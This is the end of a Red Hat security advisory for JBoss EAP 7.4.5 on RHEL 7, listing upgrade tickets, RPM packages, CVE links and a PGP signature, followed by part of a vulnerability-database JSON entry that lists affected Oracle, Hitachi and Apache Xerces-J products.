JBEAP-23120 - Tracker bug for the EAP 7.4.5 release for RHEL-7 JBEAP-23171 - (7.4.z) Upgrade HAL from 3.3.9.Final-redhat-00001 to 3.3.12.Final-redhat-00001 JBEAP-23194 - Upgrade hibernate-validator from 6.0.22.Final-redhat-00002 to 6.0.23-redhat-00001 JBEAP-23241 - GSS Upgrade jberet from 1.3.9 to 1.3.9.SP1 JBEAP-23299 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00034 to 2.16.0.redhat-00042 JBEAP-23300 - GSS Upgrade JBoss Remoting from 5.0.23.SP1 to 5.0.24.SP1 JBEAP-23312 - (7.4.z) Upgrade WildFly Core from 15.0.8.Final-redhat-00001 to 15.0.12.Final-redhat-00001 JBEAP-23313 - (7.4.z) Upgrade Elytron from 1.15.11.Final-redhat-00002 to 1.15.12.Final-redhat-00001 JBEAP-23336 - (7.4.z) Upgrade Hibernate ORM from 5.3.25.Final-redhat-00002 to 5.3.26.Final-redhat-00002 JBEAP-23338 - GSS Upgrade Undertow from 2.2.16 to 2.2.17.SP3 JBEAP-23339 - GSS Upgrade wildfly-http-ejb-client from 1.1.10 to 1.1.11.SP1 JBEAP-23351 - (7.4.z) Upgrade org.apache.logging.log4j from 2.17.1.redhat-00001 to 2.17.1.redhat-00002 JBEAP-23353 - (7.4.z) Upgrade wildfly-transaction-client from 1.1.14.Final-redhat-00001 to 1.1.15.Final-redhat-x JBEAP-23429 - PM JDK17 Update Tested Configurations page and make note in Update release notes JBEAP-23432 - GSS Upgrade JSF API from 3.0.0.SP04 to 3.0.0.SP05 JBEAP-23451 - [PST] (7.4.z) Upgrade to FasterXML Jackson to 2.12.6.redhat-00001 and Jackson Databind to 2.12.6.1.redhat-00003 JBEAP-23531 - GSS Upgrade Undertow from 2.2.17.SP3 to 2.2.17.SP4 JBEAP-23532 - (7.4.z) Upgrade WildFly Core from 15.0.12.Final-redhat-00001 to 15.0.13.Final-redhat-00001
- Package List:
Red Hat JBoss EAP 7.4 for RHEL 7 Server:
Source: eap7-activemq-artemis-2.16.0-9.redhat_00042.1.el7eap.src.rpm eap7-h2database-1.4.197-2.redhat_00004.1.el7eap.src.rpm eap7-hal-console-3.3.12-1.Final_redhat_00001.1.el7eap.src.rpm eap7-hibernate-5.3.26-1.Final_redhat_00002.2.el7eap.src.rpm eap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el7eap.src.rpm eap7-jackson-annotations-2.12.6-1.redhat_00001.1.el7eap.src.rpm eap7-jackson-core-2.12.6-1.redhat_00001.1.el7eap.src.rpm eap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el7eap.src.rpm eap7-jackson-jaxrs-providers-2.12.6-1.redhat_00001.1.el7eap.src.rpm eap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el7eap.src.rpm eap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el7eap.src.rpm eap7-jberet-1.3.9-1.SP1_redhat_00001.1.el7eap.src.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el7eap.src.rpm eap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el7eap.src.rpm eap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el7eap.src.rpm eap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el7eap.src.rpm eap7-log4j-2.17.1-2.redhat_00002.1.el7eap.src.rpm eap7-netty-4.1.72-4.Final_redhat_00001.1.el7eap.src.rpm eap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el7eap.src.rpm eap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el7eap.src.rpm eap7-snakeyaml-1.29.0-1.redhat_00001.2.el7eap.src.rpm eap7-undertow-2.2.17-2.SP4_redhat_00001.1.el7eap.src.rpm eap7-wildfly-7.4.5-3.GA_redhat_00001.1.el7eap.src.rpm eap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el7eap.src.rpm eap7-wildfly-http-client-1.1.11-1.SP1_redhat_00001.1.el7eap.src.rpm eap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el7eap.src.rpm eap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el7eap.src.rpm
noarch: eap7-activemq-artemis-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-cli-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-commons-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-core-client-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-dto-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-hornetq-protocol-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-hqclient-protocol-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-jdbc-store-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-jms-client-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-jms-server-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-journal-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-ra-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-selector-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-server-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-service-extensions-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-activemq-artemis-tools-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm eap7-h2database-1.4.197-2.redhat_00004.1.el7eap.noarch.rpm eap7-hal-console-3.3.12-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-hibernate-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm eap7-hibernate-core-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm eap7-hibernate-entitymanager-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm eap7-hibernate-envers-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm eap7-hibernate-java8-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm eap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-hibernate-validator-cdi-6.0.23-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-jackson-annotations-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-core-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el7eap.noarch.rpm eap7-jackson-datatype-jdk8-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-datatype-jsr310-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-jaxrs-base-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-jaxrs-json-provider-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-module-jaxb-annotations-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm eap7-jberet-1.3.9-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-jberet-core-1.3.9-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el7eap.noarch.rpm eap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm eap7-jboss-server-migration-cli-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm eap7-jboss-server-migration-core-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm eap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-log4j-2.17.1-2.redhat_00002.1.el7eap.noarch.rpm eap7-netty-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-all-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-buffer-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-dns-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-haproxy-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-http-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-http2-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-memcache-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-mqtt-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-redis-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-smtp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-socks-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-stomp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-codec-xml-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-common-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-handler-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-handler-proxy-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-resolver-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-resolver-dns-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-resolver-dns-classes-macos-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-classes-epoll-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-classes-kqueue-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-native-unix-common-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-rxtx-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-sctp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-netty-transport-udt-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm eap7-snakeyaml-1.29.0-1.redhat_00001.2.el7eap.noarch.rpm eap7-undertow-2.2.17-2.SP4_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-elytron-tool-1.15.12-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-http-client-common-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-http-ejb-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-http-naming-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-http-transaction-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-java-jdk11-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-java-jdk8-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-javadocs-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-modules-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm eap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el7eap.noarch.rpm eap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el7eap.noarch.rpm
x86_64: eap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el7eap.x86_64.rpm eap7-netty-transport-native-epoll-debuginfo-4.1.72-1.Final_redhat_00001.1.el7eap.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-36518 https://access.redhat.com/security/cve/CVE-2021-37136 https://access.redhat.com/security/cve/CVE-2021-37137 https://access.redhat.com/security/cve/CVE-2021-42392 https://access.redhat.com/security/cve/CVE-2021-43797 https://access.redhat.com/security/cve/CVE-2022-0084 https://access.redhat.com/security/cve/CVE-2022-0853 https://access.redhat.com/security/cve/CVE-2022-0866 https://access.redhat.com/security/cve/CVE-2022-1319 https://access.redhat.com/security/cve/CVE-2022-21299 https://access.redhat.com/security/cve/CVE-2022-21363 https://access.redhat.com/security/cve/CVE-2022-23221 https://access.redhat.com/security/cve/CVE-2022-23437 https://access.redhat.com/security/cve/CVE-2022-23913 https://access.redhat.com/security/cve/CVE-2022-24785 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYp5qBdzjgjWX9erEAQgudg/+KIuaXQZawyOnSNF4IIR8WYnfcW8Ojsfk 27VFNY6WCSn07IkzyDFuCLHsmUEesiJvpYssOx4CuX1YEmlF7S/KepyI6QDVC+BV hFAfaVE1gdrny1sqaS8k4VFE9rHODML1q2yyeUNgdtL4YGdOeduqOEn6Q6GS/rvh +8vCZFkFb9QKxxItc1xvxvU8kAomQun+eqr040IHuF0jAZfLI18/5vzsPqeQG+Ua qU4CG5FucVytEkJCnQ8Ci3QH3FCm/BPqotyhO3OAi1b5+db+fT+UqJpiuHYCsPcQ 8DRKizi/ia6Rq5b/OTFodA8lo6U3nDIljJ7QcuADgGzX4fak+BxQNkQMfhS4/b01 /yFU034PmQBTJpm0r5Vb4V4lBWzAi5QMDttI4wncuM3VGbxSoEEXzdzFHVzgoy1r qDGfJ1C5VnSJeLawDa6tGyndBiVga/PPgx0CoSIPsAYnjXYfJM1DsohUXppTL1k+ z8W2UIoIGqycYdCm60uJ+qbzqLlODNXmXn154OJL3O/o6Nz7O+uqVt+WfaNnwO/Y wf85wHGjzLaOALZfly/fENQr5Aijb9WqavN3tbcipj6+F4D3OLJMOSap8+TOXF3C StEX/XQpQASMmemvHJr/8c9Fx6tumJ+hLI4EyXfNdlYFJFQY4l4J0X6+mH047B3G R+RN8v8nzXQ{m6 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202201-1553",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucosminexus primary server base",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus application server",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus service platform",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "banking deposits and lines of credit servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7"
},
{
"model": "communications session route manager",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.1"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6.0.0"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.1"
},
{
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.11"
},
{
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.14"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9.0"
},
{
"model": "global lifecycle management nextgen oui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.9.4.2.2"
},
{
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "financial services behavior detection platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.1.0"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"model": "financial services behavior detection platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6.0.0"
},
{
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.8"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.0.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"model": "xerces-j",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "2.12.1"
},
{
"model": "health sciences information manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"model": "ilearning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2"
},
{
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"model": "product lifecycle analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.6.1"
},
{
"model": "retail extract transform and load",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.8"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.2.0"
},
{
"model": "ilearning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "financial services crime and compliance management studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.3.0"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"model": "global lifecycle management nextgen oui framework",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "13.9.4.2.2"
},
{
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.1"
},
{
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.13"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"model": "flexcube universal banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0"
},
{
"model": "communications session report manager",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"model": "health sciences information manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.5"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0"
},
{
"model": "banking party management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.0"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.30"
},
{
"model": "communications element manager",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"model": "financial services crime and compliance management studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.2.0"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.0"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.1"
},
{
"model": "retail bulk data integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0.0"
},
{
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "ucosminexus client for plug-in",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus application server enterprise",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer professional for plug-in",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "oracle financial services analytical applications infrastructure",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "oracle ilearning",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "hitachi ops center common services",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus operator",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "oracle communications session element manager",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "oracle retail extract transform and load",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "jp1/it desktop management 2 - manager",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "cosminexus xml processor",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "oracle retail financial integration",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "jp1/automatic operation",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus operator for service platform",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer professional",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer light",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "communications session route manager",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "ucosminexus application server standard-r",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer professional for atm",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0\u74b0\u5883 for java",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "xerces2 java",
"scope": null,
"trust": 0.8,
"vendor": "apache",
"version": null
},
{
"model": "ucosminexus client for atm",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus service architect",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "oracle retail bulk data integration",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "ucosminexus application server standard",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer standard",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "oracle communications session report manager",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "oracle financial services behavior detection platform",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "ucosminexus application server smart edition",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus application server express",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus application server light",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "oracle financial services enterprise case management",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"model": "jp1/operations analytics",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus client",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "jp1/it desktop management 2 - operations director",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus developer 01",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "ucosminexus application server-r",
"scope": null,
"trust": 0.8,
